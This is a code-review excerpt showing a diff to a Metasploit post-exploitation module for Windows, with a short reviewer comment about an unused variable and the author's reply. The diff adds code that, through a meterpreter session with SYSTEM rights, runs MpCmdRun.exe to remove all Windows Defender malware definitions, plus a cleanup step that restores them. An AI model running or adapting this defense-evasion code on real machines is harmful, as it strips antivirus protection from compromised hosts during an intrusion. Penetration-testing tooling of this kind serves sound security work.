modules/post/windows/manage/disable_windowsdefender_signatures.rb

```diff
@@ -24,16 +25,43 @@ def initialize(info={})
       'Platform'      => [ 'win' ],
       'SessionTypes'  => [ 'meterpreter' ],
       ))
+    register_options(
+      [
+        OptBool.new('AUTO_CLEANUP', [ true, 'Attempt to return protections after session exit', true ])
+      ])
+
   end
 
   def run
-    unless is_system?()
-      print_status("Remove Definitions Windows Defender")
-      file_path = "C:\\Program Files\\Windows Defender\\MpCmdRun.exe"
-      if exist?(file_path)
-        cmd = cmd_exec('cmd.exe', "/c \"#{file_path}\" -RemoveDefinitions -All")
+    #Are we system?
+    if not is_system?()
+      fail_with(Failure::NoAccess, "You must be System to run this Module")
+    end
+    #Is the binary there?
+    program_path = session.sys.config.getenv('ProgramFiles')
+    vprint_status("program_path = #{program_path}")
+    file_path = program_path + '\Windows Defender\MpCmdRun.exe'
+    vprint_status("file_path = #{file_path}")
+    if not exist?(file_path)
+      fail_with(Failure::NoAccess, "#{file_path} is not Present")
+    end
+    #Is defender even enabled?
+    defender_disable_key = "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender"
+    disable_key_value = meterpreter_registry_getvalinfo(defender_disable_key, "DisableAntiSpyware", REGISTRY_VIEW_NATIVE)
+    if disable_key_value.nil? || disable_key_value != 1
+      print_status("Removing All Definitions for Windows Defender")
+      cmd = cmd_exec('cmd.exe', "/c \"#{file_path}\" -RemoveDefinitions -All")
+      if cmd.include?('denied')
+        print_bad("#{cmd}")
+      else
         print_status("#{cmd}")
       end
+    else
+      fail_with(Failure::BadConfig, "Defender is not Enabled")
     end
   end
+  def cleanup
+    cmd = cmd_exec('cmd.exe', "/c \"#{file_path}\" -SignatureUpdate")
```

Comment:
I think if you're not using the return value (the `cmd` variable), you probably don't really need it... unless there's a style guide that says you should otherwise? I'd probably just do:

```ruby
def cleanup
  cmd_exec('cmd.exe', "/c \"#{file_path}\" -SignatureUpdate")
end
```

Reply:
I meant to print the output out.  I just forgot.  I will check out OJ's earlier suggestion to channel it through ShellExecute